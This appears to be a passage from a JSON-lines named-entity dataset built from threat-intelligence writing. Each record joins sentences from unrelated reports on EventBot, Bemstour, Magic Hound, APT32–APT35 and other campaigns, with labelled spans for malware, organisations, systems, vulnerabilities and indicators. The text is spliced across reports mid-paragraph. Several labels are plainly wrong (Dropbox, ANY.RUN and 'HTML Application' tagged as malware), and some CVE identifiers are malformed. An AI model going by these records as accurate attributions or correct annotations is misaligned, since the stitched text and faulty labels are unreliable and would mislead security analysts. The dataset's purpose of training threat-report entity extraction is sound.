"Malware"}, {"start": 104, "end": 112, "label": "Malware"}, {"start": 307, "end": 317, "label": "Organization"}, {"start": 320, "end": 326, "label": "Organization"}, {"start": 333, "end": 351, "label": "Organization"}]} {"text": "DOWNLOAD AND UPDATE THE TARGET CONFIGURATION FILE By analyzing and decoding the HTTP packets in EventBot Version 0.0.0.1 , we can see that EventBot downloads and updates a configuration file with almost 200 different financial application targets . 
Bemstour was used again in June 2017 in an attack against an organization in Luxembourg . The Magic Hound attacks did not rely on exploit code to compromise targeted systems , instead relying on Excel and Word documents containing malicious macros .", "spans": [{"start": 96, "end": 104, "label": "Malware"}, {"start": 139, "end": 147, "label": "Malware"}, {"start": 249, "end": 257, "label": "Malware"}, {"start": 379, "end": 386, "label": "Vulnerability"}]} {"text": "Following is the HTTP response from the C2 server , containing the encrypted configuration : EventBot Encrypted HTTP response returned from the C2 Encrypted HTTP response returned from the C2 . Between June and September 2017 , Bemstour was also used against targets in the Philippines and Vietnam . The MPK bot is not publicly available and had previously been attributed to an adversary group called \" Rocket Kitten \" which has often been thought to be a state sponsored adversary operating in the Middle East region .", "spans": [{"start": 93, "end": 101, "label": "Malware"}, {"start": 228, "end": 236, "label": "Malware"}, {"start": 304, "end": 311, "label": "Malware"}, {"start": 404, "end": 417, "label": "Organization"}]} {"text": "In Version 0.0.0.1 , the communication with the C2 is encrypted using Base64 and RC4 . Development of Bemstour has continued into 2019 . One payload was a Python based open source remote administration tool ( RAT ) called Pupy .", "spans": [{"start": 102, "end": 110, "label": "Malware"}, {"start": 155, "end": 161, "label": "System"}, {"start": 180, "end": 206, "label": "Malware"}, {"start": 209, "end": 212, "label": "Malware"}, {"start": 222, "end": 226, "label": "Malware"}]} {"text": "The RC4 key is hardcoded in EventBot . Unlike earlier attacks when Bemstour was delivered using Buckeye's Pirpi backdoor , in this attack Bemstour was delivered to the victim by a different backdoor Trojan (Backdoor.Filensfer) . 
The Magic Hound campaign used Word and Excel documents containing malicious macros as a delivery method , specifically attempting to load MagicHound.Rollover .", "spans": [{"start": 28, "end": 36, "label": "Malware"}, {"start": 67, "end": 75, "label": "Malware"}, {"start": 106, "end": 111, "label": "Malware"}, {"start": 112, "end": 120, "label": "Malware"}, {"start": 180, "end": 189, "label": "System"}, {"start": 190, "end": 198, "label": "System"}, {"start": 367, "end": 386, "label": "Malware"}]} {"text": "Upon decryption , we can see that the response from the server is a JSON object of EventBot \u2019 s configuration , which contains C2 URLs and a targeted applications list . The most recent sample of Bemstour seen by Symantec appears to have been compiled on March 23 , 2019 , eleven days after the zero-day vulnerability was patched by Microsoft . Many of the Fetch samples we analyzed attempted to obfuscate their functionality by encrypting their embedded strings using AES .", "spans": [{"start": 83, "end": 91, "label": "Malware"}, {"start": 196, "end": 204, "label": "Malware"}, {"start": 213, "end": 221, "label": "Organization"}, {"start": 469, "end": 472, "label": "Malware"}]} {"text": "Decrypted EventBot configuration Decrypted EventBot configuration returned from the C2 . Filensfer is a family of malware that has been used in targeted attacks since at least 2013 . The loader 's main goal was to run a PowerShell command to execute shellcode .", "spans": [{"start": 10, "end": 18, "label": "Malware"}, {"start": 43, "end": 51, "label": "Malware"}, {"start": 89, "end": 98, "label": "Malware"}, {"start": 220, "end": 238, "label": "Malware"}]} {"text": "The configuration file contains a list of financial applications that can be targeted by EventBot . 
While Symantec has never observed the use of Filensfer alongside any known Buckeye tools , information shared privately by another vendor included evidence of Filensfer being used in conjunction with known Buckeye malware (Backdoor.Pirpi) . To set up persistence , the loader writes a file to \" c:\\temp\\rr.exe \" and executes it with specific command line arguments to create auto run registry keys .", "spans": [{"start": 89, "end": 97, "label": "Malware"}, {"start": 106, "end": 114, "label": "Organization"}, {"start": 145, "end": 154, "label": "Malware"}, {"start": 306, "end": 321, "label": "Malware"}, {"start": 322, "end": 338, "label": "System"}, {"start": 395, "end": 409, "label": "Indicator"}]} {"text": "This version includes 185 different applications , including official applications of worldwide banks . CVE-2017-0143 was also used by two other exploit tools\u2014EternalRomance and EternalSynergy\u2014that were released as part of the Shadow Brokers leak in April 2017 . The Magic Hound campaign was also discovered using a custom dropper tool , which we have named MagicHound.DropIt .", "spans": [{"start": 104, "end": 117, "label": "Vulnerability"}, {"start": 153, "end": 173, "label": "Malware"}, {"start": 178, "end": 197, "label": "Malware"}, {"start": 316, "end": 330, "label": "Malware"}, {"start": 358, "end": 375, "label": "Indicator"}]} {"text": "26 of the targeted applications are from Italy , 25 are from the UK , 6 are from Germany , 5 are from France , and 3 are from Spain . Buckeye's exploit tool , EternalRomance , as well as EternalSynergy , can exploit the CVE-2017-0143 message type confusion vulnerability to perform memory corruption on unpatched victim computers . 
We have also seen Magic Hound using DropIt as a binder , specifically dropping a legitimate decoy executable along with the malicious executable onto the target host .", "spans": [{"start": 159, "end": 173, "label": "Malware"}, {"start": 187, "end": 201, "label": "Malware"}, {"start": 220, "end": 233, "label": "Malware"}, {"start": 368, "end": 374, "label": "Malware"}]} {"text": "However , it also targets applications from Romania , Ireland , India , Austria , Switzerland , Australia , Poland and the USA . this RTF exploits again the CVE-2017_1882 on eqnedt32.exe . We also found a second IRC bot called MPK using the same IP for its C2 server that a Leash sample was hosted on .", "spans": [{"start": 134, "end": 137, "label": "Malware"}, {"start": 157, "end": 170, "label": "Vulnerability"}, {"start": 174, "end": 186, "label": "Malware"}, {"start": 212, "end": 219, "label": "Malware"}, {"start": 227, "end": 230, "label": "Malware"}, {"start": 246, "end": 248, "label": "Indicator"}, {"start": 257, "end": 259, "label": "System"}, {"start": 274, "end": 286, "label": "Malware"}]} {"text": "In addition to official banking applications , the target list includes 111 other global financial applications for banking and credit card management , money transfers , and cryptocurrency wallets and exchanges . And the dropper execute the iassvcs.exe to make a side loading and make the persistence . The Magic Hound attack campaign is an active and persistent espionage motivated adversary operating in the Middle East region .", "spans": [{"start": 222, "end": 229, "label": "Malware"}, {"start": 242, "end": 253, "label": "Malware"}]} {"text": "Those targeted include Paypal Business , Revolut , Barclays , UniCredit , CapitalOne UK , HSBC UK , Santander UK , TransferWise , Coinbase , paysafecard , and many more . Over the past three years , Filensfer has been deployed against organizations in Luxembourg , Sweden , Italy , the UK , and the U.S . 
Organizations in the government , energy , and technology sectors have been targeted by Magic Hound , specifically organizations based in or doing business in Saudi Arabia .", "spans": [{"start": 23, "end": 38, "label": "System"}, {"start": 41, "end": 48, "label": "System"}, {"start": 51, "end": 59, "label": "System"}, {"start": 62, "end": 71, "label": "System"}, {"start": 74, "end": 87, "label": "System"}, {"start": 90, "end": 97, "label": "System"}, {"start": 100, "end": 112, "label": "System"}, {"start": 115, "end": 127, "label": "System"}, {"start": 130, "end": 138, "label": "System"}, {"start": 141, "end": 152, "label": "System"}, {"start": 199, "end": 208, "label": "Malware"}, {"start": 326, "end": 336, "label": "Organization"}, {"start": 339, "end": 345, "label": "Organization"}, {"start": 352, "end": 370, "label": "Organization"}]} {"text": "The full list of banking applications targeted is included in the appendix . Our analysis of this malware shows that it belongs to Hussarini , also known as Sarhust , a backdoor family that has been used actively in APT attacks targeting countries in the ASEAN region since 2014 . At a high level , Retriever is a .NET downloader that downloads secondary payloads from servers associated with Magic Hound .", "spans": [{"start": 131, "end": 140, "label": "Malware"}, {"start": 299, "end": 308, "label": "Malware"}, {"start": 314, "end": 329, "label": "Malware"}]} {"text": "ABUSE OF ACCESSIBILITY SERVICES EventBot abuses the accessibility services of Android devices for the majority of its activity . OutExtra.exe is a signed legitimate application from Microsoft named finder.exe . 
For example , we analyzed a DropIt sample ( SHA256 : cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671 ) that dropped two executables , one of which was saved to \" %TEMP%\\flash_update.exe \" that was a legitimate Flash Player installer .", "spans": [{"start": 32, "end": 40, "label": "Malware"}, {"start": 78, "end": 85, "label": "System"}, {"start": 129, "end": 141, "label": "Malware"}, {"start": 198, "end": 208, "label": "Malware"}, {"start": 239, "end": 252, "label": "Malware"}, {"start": 264, "end": 328, "label": "Indicator"}, {"start": 390, "end": 413, "label": "Indicator"}, {"start": 438, "end": 460, "label": "Malware"}]} {"text": "Accessibility features are typically used to help users with disabilities by giving the device the ability to write into input fields , auto-generate permissions , perform gestures for the user , etc . Today , this malware is still actively being used against the Philippines . M-Trends 2018 can arm security teams with the knowledge they need to defend against today 's most often used cyber attacks , as well as lesser seen and emerging threats .", "spans": [{"start": 215, "end": 222, "label": "Malware"}, {"start": 278, "end": 286, "label": "Organization"}]} {"text": "However , when used maliciously , accessibility features can be used to exploit legitimate services for malicious purposes , like with EventBot . Xagent is the original filename Xagent.exe whereas seems to be the version of the worm . 
FireEye tracks thousands of threat actors , but pays special attention to state-sponsored attackers who carry out advanced persistent threat ( APT ) attacks .", "spans": [{"start": 135, "end": 143, "label": "Malware"}, {"start": 146, "end": 152, "label": "Malware"}, {"start": 178, "end": 188, "label": "Malware"}, {"start": 228, "end": 232, "label": "Malware"}, {"start": 235, "end": 242, "label": "Organization"}, {"start": 270, "end": 276, "label": "Organization"}, {"start": 325, "end": 334, "label": "Organization"}]} {"text": "EventBot uses multiple methods to exploit accessibility events for webinjects and other information stealing purposes . Our technical analysis of the malware used in these attacks showed close ties to BS2005 backdoors from operation Ke3chang , and to a related TidePool malware family discovered by Palo Alto Networks in 2016 that targeted Indian embassies across the globe . Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations with investments in Vietnam , foreign governments , journalists , and Vietnamese dissidents .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 150, "end": 157, "label": "Malware"}, {"start": 201, "end": 217, "label": "Malware"}, {"start": 261, "end": 277, "label": "Malware"}, {"start": 299, "end": 308, "label": "Organization"}, {"start": 398, "end": 403, "label": "Organization"}, {"start": 424, "end": 440, "label": "Organization"}, {"start": 456, "end": 476, "label": "Organization"}, {"start": 507, "end": 526, "label": "Organization"}, {"start": 529, "end": 540, "label": "Organization"}, {"start": 558, "end": 568, "label": "Organization"}]} {"text": "DATA GATHERING Getting a list of all installed applications : Once EventBot is installed on the target machine , it lists all the applications on the target machine and sends them to the C2 . 
The malicious actors behind the Okrum malware were focused on the same targets in Slovakia that were previously targeted by Ketrican 2015 backdoors . During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros .", "spans": [{"start": 67, "end": 75, "label": "Malware"}, {"start": 224, "end": 237, "label": "Malware"}, {"start": 330, "end": 339, "label": "Malware"}, {"start": 369, "end": 374, "label": "Organization"}, {"start": 404, "end": 410, "label": "System"}, {"start": 416, "end": 441, "label": "Indicator"}]} {"text": "Device information : EventBot queries for device information like OS , model , etc , and also sends that to the C2 . We started connecting the dots when we discovered that the Okrum backdoor was used to drop a Ketrican backdoor , freshly compiled in 2017 . Evidence also suggests that APT32 has targeted network security and technology infrastructure corporations with connections to foreign investors .", "spans": [{"start": 21, "end": 29, "label": "Malware"}, {"start": 176, "end": 190, "label": "Malware"}, {"start": 210, "end": 227, "label": "Malware"}, {"start": 285, "end": 290, "label": "Organization"}, {"start": 304, "end": 320, "label": "Organization"}, {"start": 325, "end": 363, "label": "Organization"}]} {"text": "EventBot infected device to be sent to the C Information gathered about the infected device to be sent to the C2 . In 2017 , the same entities that were affected by the Okrum malware and by the 2015 Ketrican backdoors again became targets of the malicious actors . 
Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations foreign governments .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 169, "end": 182, "label": "Malware"}, {"start": 199, "end": 217, "label": "Malware"}, {"start": 287, "end": 292, "label": "Organization"}, {"start": 313, "end": 329, "label": "Organization"}, {"start": 345, "end": 365, "label": "Organization"}, {"start": 374, "end": 385, "label": "Organization"}]} {"text": "Data encryption : In the initial version of EventBot , the data being exfiltrated is encrypted using Base64 and RC4 . This time , the attackers used new versions of the RoyalDNS malware and a Ketrican 2017 backdoor . FireEye asesses that APT32 actors may be aligned with the national interests of Vietnam .", "spans": [{"start": 44, "end": 52, "label": "Malware"}, {"start": 169, "end": 185, "label": "Malware"}, {"start": 192, "end": 200, "label": "Malware"}, {"start": 217, "end": 224, "label": "Organization"}, {"start": 238, "end": 250, "label": "Organization"}]} {"text": "In later versions , another encryption layer is added using Curve25519 encryption . According to ESET telemetry , Okrum was first detected in December 2016 , and targeted diplomatic missions in Slovakia , Belgium , Chile , Guatemala and Brazil throughout 2017 . APT32 poses a threat to companies doing business or preparing to invest in Vietnam .", "spans": [{"start": 97, "end": 101, "label": "Organization"}, {"start": 114, "end": 119, "label": "Malware"}, {"start": 262, "end": 267, "label": "Organization"}]} {"text": "All of the most recent versions of EventBot contain a ChaCha20 library that can improve performance when compared to other algorithms like RC4 and AES . According to our telemetry , Okrum was used to target diplomatic missions in Slovakia , Belgium , Chile , Guatemala , and Brazil , with the attackers showing a particular interest in Slovakia . 
We believe recent activity targeting private interests in Vietnam suggests that APT32 poses a threat to companies doing business or preparing to invest in the country .", "spans": [{"start": 35, "end": 43, "label": "Malware"}, {"start": 54, "end": 62, "label": "System"}, {"start": 182, "end": 187, "label": "Malware"}, {"start": 427, "end": 432, "label": "Organization"}]} {"text": "This implies that the authors are actively working to optimize EventBot over time . The detection evasion techniques we observed in the Okrum malware include embedding the malicious payload within a legitimate PNG image , employing several anti-emulation and anti-sandbox tricks , as well as making frequent changes in implementation . DROPSHOT is a notable piece of malware used to deliver variants of the TURNEDUP backdoor .", "spans": [{"start": 63, "end": 71, "label": "Malware"}, {"start": 136, "end": 141, "label": "Malware"}, {"start": 158, "end": 167, "label": "Malware"}, {"start": 336, "end": 344, "label": "Malware"}, {"start": 367, "end": 374, "label": "Malware"}]} {"text": "SMS grabbing : EventBot has the ability to parse SMS messages by using the targeted device \u2019 s SDK version to parse them correctly . According to ClearSky , the suspected Lazarus operatives looked to leverage a vulnerability in outdated WinRAR file-archiving software that hackers have been exploiting since it was disclosed last month . Additionally , there is evidence to suggest APT33 targeted Saudi Arabia .", "spans": [{"start": 15, "end": 23, "label": "Malware"}, {"start": 146, "end": 154, "label": "Organization"}, {"start": 237, "end": 243, "label": "Malware"}, {"start": 382, "end": 387, "label": "Organization"}]} {"text": "EventBot parsing of grabbed SMS messages Parsing of grabbed SMS messages . The diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals . 
APT33 often conducts spear-phishing operations using a built-in phishing module .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 142, "end": 152, "label": "Malware"}, {"start": 167, "end": 180, "label": "Malware"}, {"start": 210, "end": 215, "label": "Organization"}]} {"text": "Webinjects : According to the bot \u2019 s configuration , if a webinject is set for a given application , it will be executed . If the user enables macro to open the xlsm file , it will then drop the legitimate script engine AutoHotkey along with a malicious script file . Additionally , there is evidence to suggest APT33 targeted Saudi Arabian and Western organizations that provide training , maintenance and support for Saudi Arabia 's military and commercial fleets .", "spans": [{"start": 162, "end": 171, "label": "System"}, {"start": 174, "end": 176, "label": "Malware"}, {"start": 187, "end": 213, "label": "Malware"}, {"start": 313, "end": 318, "label": "Organization"}, {"start": 436, "end": 444, "label": "Organization"}, {"start": 449, "end": 459, "label": "Organization"}]} {"text": "EventBot web injects execution method Web injects execution method by a pre-established configuration . Create a link file in the startup folder for AutoHotkeyU32.exe , allowing the attack to persist even after a system restart . 
Although we have only observed APT33 use DROPSHOT to deliver TURNEDUP , we have identified multiple DROPSHOT samples in the wild that delivered wiper malware we call SHAPESHIFT .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 113, "end": 122, "label": "Malware"}, {"start": 149, "end": 166, "label": "Malware"}, {"start": 261, "end": 266, "label": "Organization"}, {"start": 271, "end": 279, "label": "Malware"}, {"start": 330, "end": 346, "label": "Malware"}, {"start": 396, "end": 406, "label": "Malware"}]} {"text": "BOT UPDATES EventBot has a long method called parseCommand that can update EventBot \u2019 s configuration XML files , located in the shared preferences folder on the device . Such attacks highlight the need for caution before downloading files from unknown sources and enabling macro for files from unknown sources . The SHAPESHIFT wiper is capable of wiping disks and volumes , as well as deleting files .", "spans": [{"start": 12, "end": 20, "label": "Malware"}, {"start": 75, "end": 83, "label": "Malware"}, {"start": 176, "end": 183, "label": "Malware"}, {"start": 317, "end": 333, "label": "Malware"}]} {"text": "EventBot Dropped XML configuration files Dropped XML configuration files on the device . Its configuration utilities like Margarita allows the NOC (Network Operation Center) to customize tools based on requirements from 'Fine Dining' questionairies . Ties to SHAPESHIFT suggest that APT33 may engage in destructive operations or shares tools or development resources with an Iranian threat group that conducts destructive operations .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 122, "end": 131, "label": "Malware"}, {"start": 202, "end": 214, "label": "Malware"}, {"start": 259, "end": 269, "label": "Malware"}, {"start": 283, "end": 288, "label": "Organization"}]} {"text": "EventBot uses this function to update its C2s , the configuration of webinjects , etc . 
Honeycomb toolserver receives exfiltrated information from the implant; an operator can also task the implant to execute jobs on the target computer , so the toolserver acts as a C2 (command and control) server for the implant . In a recent attack , APT33 sent spear-phishing emails to workers in the aviation industry .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 88, "end": 97, "label": "Malware"}, {"start": 257, "end": 261, "label": "Malware"}, {"start": 338, "end": 343, "label": "Organization"}, {"start": 364, "end": 370, "label": "System"}, {"start": 389, "end": 406, "label": "Organization"}]} {"text": "The following code shows EventBot parsing instructions sent from the C2 . UMBRAGE components cover keyloggers , password collection , webcam capture , data destruction , persistence , privilege escalation , stealth , anti-virus (PSP) avoidance and survey techniques . The HTA files contained job descriptions and links to job postings on popular employment websites .", "spans": [{"start": 25, "end": 33, "label": "Malware"}, {"start": 74, "end": 81, "label": "Malware"}, {"start": 93, "end": 109, "label": "Malware"}, {"start": 112, "end": 131, "label": "Malware"}, {"start": 134, "end": 148, "label": "Malware"}, {"start": 151, "end": 167, "label": "Malware"}, {"start": 170, "end": 181, "label": "Malware"}, {"start": 184, "end": 204, "label": "Malware"}, {"start": 207, "end": 214, "label": "Malware"}, {"start": 248, "end": 254, "label": "Malware"}, {"start": 272, "end": 281, "label": "Indicator"}]} {"text": "Parsing of instructions by EventBot Parsing of instructions by the bot from the C2 . 'Improvise' is a toolset for configuration , post-processing , payload setup and execution vector selection for survey/exfiltration tools supporting all major operating systems like Windows (Bartender) , MacOS (JukeBox) and Linux (DanceFloor) . 
Since at least 2014 , an Iranian threat group tracked by FireEye as APT34 has conducted reconnaissance aligned with the strategic interests of Iran .", "spans": [{"start": 27, "end": 35, "label": "Malware"}, {"start": 85, "end": 96, "label": "Malware"}, {"start": 114, "end": 127, "label": "Malware"}, {"start": 130, "end": 145, "label": "Malware"}, {"start": 148, "end": 161, "label": "Malware"}, {"start": 166, "end": 182, "label": "Malware"}, {"start": 387, "end": 394, "label": "Organization"}, {"start": 398, "end": 403, "label": "Organization"}]} {"text": "UNIQUE FEATURES BY VERSION EventBot Version 0.0.0.1 RC4 and Base64 Packet Encryption EventBot RC4 and Base64 data decryption from the C2 RC4 and Base64 data decryption from the C2 . This sample , similar to other Trochilus samples , was deployed using a DLL sideloading method utilizing three files , uploaded to the same folder on the victim machine as identified in US-CERT advisory TA17-117A last revised on December 20 , 2018 . These emails included recruitment-themed lures and links to malicious HTML Application files .", "spans": [{"start": 27, "end": 35, "label": "Malware"}, {"start": 85, "end": 93, "label": "Malware"}, {"start": 187, "end": 193, "label": "Malware"}, {"start": 213, "end": 222, "label": "Malware"}, {"start": 254, "end": 269, "label": "Malware"}, {"start": 301, "end": 309, "label": "Malware"}, {"start": 438, "end": 444, "label": "System"}, {"start": 502, "end": 518, "label": "System"}]} {"text": "As mentioned above , EventBot Version 0.0.0.1 sends a JSON object containing the Android package names of all the apps installed on the victim \u2019 s device alongside additional metadata , including the bot version , botnetID , and the reason this package is sent . The configuration file then loads the Trochilus payload into memory by injecting it into a valid system process . 
The OilRig group conducts operations primarily in the Middle East , targeting financial , government , energy , chemical , telecommunications and other industries .", "spans": [{"start": 21, "end": 29, "label": "Malware"}, {"start": 81, "end": 88, "label": "System"}, {"start": 267, "end": 285, "label": "Malware"}, {"start": 334, "end": 343, "label": "Malware"}, {"start": 381, "end": 393, "label": "Organization"}, {"start": 455, "end": 464, "label": "Organization"}, {"start": 467, "end": 477, "label": "Organization"}, {"start": 480, "end": 486, "label": "Organization"}, {"start": 489, "end": 497, "label": "Organization"}, {"start": 500, "end": 518, "label": "Organization"}]} {"text": "For this particular packet , the reason is registration of the bot . Additionally , the same DLL sideloading technique observed in the Visma attack was used , and many of the tools deployed by the APT10 shared naming similarities as well 1.bat , cu.exe , ss.rar , r.exe , pd.exe . APT34 uses a mix of public and non-public tools .", "spans": [{"start": 135, "end": 140, "label": "System"}, {"start": 197, "end": 202, "label": "Organization"}, {"start": 238, "end": 243, "label": "Malware"}, {"start": 246, "end": 252, "label": "Malware"}, {"start": 255, "end": 261, "label": "Malware"}, {"start": 264, "end": 269, "label": "Malware"}, {"start": 272, "end": 278, "label": "Malware"}, {"start": 281, "end": 286, "label": "Organization"}, {"start": 301, "end": 328, "label": "Malware"}]} {"text": "If the connection to the C2 fails , it will continue to retry until it is successful . Most interestingly , Rapid7 observed the use of the Notepad++ updater gup.exe as a legitimate executable to sideload a malicious DLL (libcurl.dll) in order to deploy a variant of the UPPERCUT backdoor also known as ANEL . 
APT34 often uses compromised accounts to conduct spear-phishing operations .", "spans": [{"start": 108, "end": 114, "label": "Organization"}, {"start": 157, "end": 164, "label": "Malware"}, {"start": 302, "end": 306, "label": "Malware"}, {"start": 309, "end": 314, "label": "Organization"}, {"start": 326, "end": 346, "label": "Malware"}]} {"text": "EventBot Logcat from the infected device Logcat from the infected device . Insikt Group analysis of network metadata to and from the VPN endpoint IPs revealed consistent connectivity to Citrix-hosted infrastructure from all eight VPN endpoint IPs starting on August 17 , 2018 \u2014 the same date the first authenticated login to Visma\u2019s network was made using stolen credentials . APT33 leverages a mix of public and non-public tools and often conducts spear-phishing operations using a built-in phishing module from \" ALFA TEaM Shell \" , a publicly available web shell .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 75, "end": 87, "label": "Organization"}, {"start": 186, "end": 199, "label": "Malware"}, {"start": 230, "end": 242, "label": "Malware"}, {"start": 377, "end": 382, "label": "Organization"}, {"start": 402, "end": 429, "label": "Malware"}, {"start": 515, "end": 530, "label": "Malware"}, {"start": 537, "end": 565, "label": "Malware"}]} {"text": "EVENTBOT VERSION 0.0.0.2 Dynamic Library Loading As of Version 0.0.0.2 , EventBot attempts to hide its main functionality from static analysis . KHRAT is a backdoor trojan purported to be used with the China-linked cyberespionage group DragonOK . 
In July 2017 , FireEye observed APT34 targeting an organization in the Middle East using the POWRUNER PowerShell-based backdoor and the downloader BONDUPDATER .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 73, "end": 81, "label": "Malware"}, {"start": 145, "end": 150, "label": "Malware"}, {"start": 156, "end": 171, "label": "System"}, {"start": 236, "end": 244, "label": "Organization"}, {"start": 262, "end": 269, "label": "Organization"}, {"start": 279, "end": 284, "label": "Organization"}, {"start": 340, "end": 374, "label": "Malware"}, {"start": 394, "end": 405, "label": "Malware"}]} {"text": "With Version 0.0.0.1 , there is a dedicated functions class where all main malicious activity happens and can be observed . Rapid7 reviewed malware discovered in the victim\u2019s environment and found implants that used Dropbox as the C2 . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 .", "spans": [{"start": 124, "end": 130, "label": "Organization"}, {"start": 216, "end": 223, "label": "Malware"}, {"start": 236, "end": 244, "label": "Malware"}, {"start": 277, "end": 285, "label": "Indicator"}, {"start": 301, "end": 314, "label": "Vulnerability"}]} {"text": "Instead , in Version 0.0.0.2 , EventBot dynamically loads its main module . The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 . 
In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch .", "spans": [{"start": 31, "end": 39, "label": "Malware"}, {"start": 222, "end": 228, "label": "Malware"}, {"start": 248, "end": 262, "label": "Vulnerability"}, {"start": 266, "end": 279, "label": "Vulnerability"}, {"start": 301, "end": 306, "label": "Organization"}, {"start": 321, "end": 337, "label": "System"}, {"start": 352, "end": 366, "label": "Vulnerability"}, {"start": 377, "end": 385, "label": "Malware"}, {"start": 390, "end": 401, "label": "Malware"}, {"start": 425, "end": 434, "label": "Organization"}]} {"text": "EventBot loaded library Loaded library as seen in Logcat . After further analysis , it was discovered that the RTF files were exploiting the CVE-2018-0798 vulnerability in Microsoft\u2019s Equation Editor (EQNEDT32) . FireEye has identified APT35 operations dating back to 2014 .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 111, "end": 120, "label": "Malware"}, {"start": 141, "end": 154, "label": "Vulnerability"}, {"start": 213, "end": 220, "label": "Organization"}, {"start": 236, "end": 241, "label": "Organization"}]} {"text": "By browsing EventBot \u2019 s installation path on the device , we can see the library dropped in the app_dex folder . Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 . 
APT35 , also known as the Newscaster Team , is a threat group sponsored by the Iranian government that conducts long term , resource-intensive operations to collect strategic intelligence .", "spans": [{"start": 12, "end": 20, "label": "Malware"}, {"start": 114, "end": 121, "label": "Organization"}, {"start": 200, "end": 203, "label": "Malware"}, {"start": 231, "end": 244, "label": "Vulnerability"}, {"start": 247, "end": 252, "label": "Organization"}, {"start": 273, "end": 288, "label": "Organization"}]} {"text": "EventBot loaded library The loaded library dropped on the device . The earliest use of the exploit ITW we were able to identify and confirm is a sample (e228045ef57fb8cc1226b62ada7eee9b) dating back to October 2018 (VirusTotal submission of 2018-10-29) with the RTF creation time 2018-10-23 . APT35 typically targets military , diplomatic and government , media , energy , engineering , business services and telecommunications sectors in U.S. and the Middle East .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 99, "end": 102, "label": "Malware"}, {"start": 262, "end": 265, "label": "Malware"}, {"start": 293, "end": 298, "label": "Organization"}, {"start": 317, "end": 325, "label": "Organization"}, {"start": 328, "end": 338, "label": "Organization"}, {"start": 343, "end": 353, "label": "Organization"}, {"start": 356, "end": 361, "label": "Organization"}, {"start": 364, "end": 370, "label": "Organization"}, {"start": 373, "end": 384, "label": "Organization"}, {"start": 387, "end": 404, "label": "Organization"}, {"start": 409, "end": 435, "label": "Organization"}]} {"text": "The code to load the main module dynamically can also be seen statically . Upon decrypting and executing , it drops two additional files wsc_proxy.exe (legitimate Avast executable) and a malicious DLL wsc.dll in the %TEMP% folder . 
APT35 has historically used unsophisticated tools like those listed below in Figure 3 .", "spans": [{"start": 137, "end": 150, "label": "Malware"}, {"start": 201, "end": 208, "label": "Malware"}, {"start": 232, "end": 237, "label": "Organization"}, {"start": 260, "end": 281, "label": "Malware"}]} {"text": "The malicious library is loaded from Eventbot \u2019 s assets that contain a font file called default.ttf which is actually the hidden library and then decoded using RC4 . However , Beginning on 25 June 2019 , we started observing multiple commodity campaigns Mostly dropping AsyncRAT using the updated RTF weaponizer with the same exploit (CVE-2018-0798) . APT35 typically targets U.S. and the Middle Eastern military , diplomatic and government personnel , organizations in the media , energy and defense industrial base ( DIB ) , and engineering , business services and telecommunications sectors .", "spans": [{"start": 37, "end": 45, "label": "Malware"}, {"start": 89, "end": 100, "label": "Indicator"}, {"start": 205, "end": 207, "label": "Organization"}, {"start": 271, "end": 279, "label": "Malware"}, {"start": 353, "end": 358, "label": "Organization"}, {"start": 405, "end": 413, "label": "Organization"}, {"start": 416, "end": 426, "label": "Organization"}, {"start": 431, "end": 451, "label": "Organization"}, {"start": 454, "end": 467, "label": "Organization"}, {"start": 475, "end": 480, "label": "Organization"}, {"start": 483, "end": 489, "label": "Organization"}, {"start": 494, "end": 517, "label": "Organization"}, {"start": 520, "end": 523, "label": "Organization"}, {"start": 532, "end": 543, "label": "Organization"}, {"start": 546, "end": 563, "label": "Organization"}, {"start": 568, "end": 594, "label": "Organization"}]} {"text": "EventBot method responsible for the library loading The method responsible for the library loading . In addition , a current ANY.RUN playback of our observed Elise infection is also available . 
Many of the fake personas utilized by APT35 claimed to be part of news organizations , which led to APT35 being referred to as the Newscaster Team .", "spans": [{"start": 125, "end": 132, "label": "Malware"}, {"start": 158, "end": 163, "label": "Malware"}, {"start": 232, "end": 237, "label": "Organization"}, {"start": 260, "end": 278, "label": "Organization"}, {"start": 294, "end": 299, "label": "Organization"}, {"start": 325, "end": 340, "label": "Organization"}]} {"text": "EventBot has the ability to update its library or potentially even download a second library when given a command from the C2 . Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control . Since at least 2013 , the Iranian threat group that FireEye tracks as APT33 has carried out a Cyber Espionage operation to collect information from defense , aerospace and petrochemical organizations .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 194, "end": 208, "label": "Vulnerability"}, {"start": 275, "end": 289, "label": "Malware"}, {"start": 320, "end": 332, "label": "Malware"}, {"start": 465, "end": 472, "label": "Organization"}, {"start": 483, "end": 488, "label": "Organization"}, {"start": 561, "end": 568, "label": "Organization"}, {"start": 571, "end": 580, "label": "Organization"}, {"start": 585, "end": 612, "label": "Organization"}]} {"text": "An updated library name is generated by calculating the md5sum of several device properties , while concatenating the build model twice in case of an update to the library . Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , 'EQNEDT32.exe' , scores high for potentially malicious activity . 
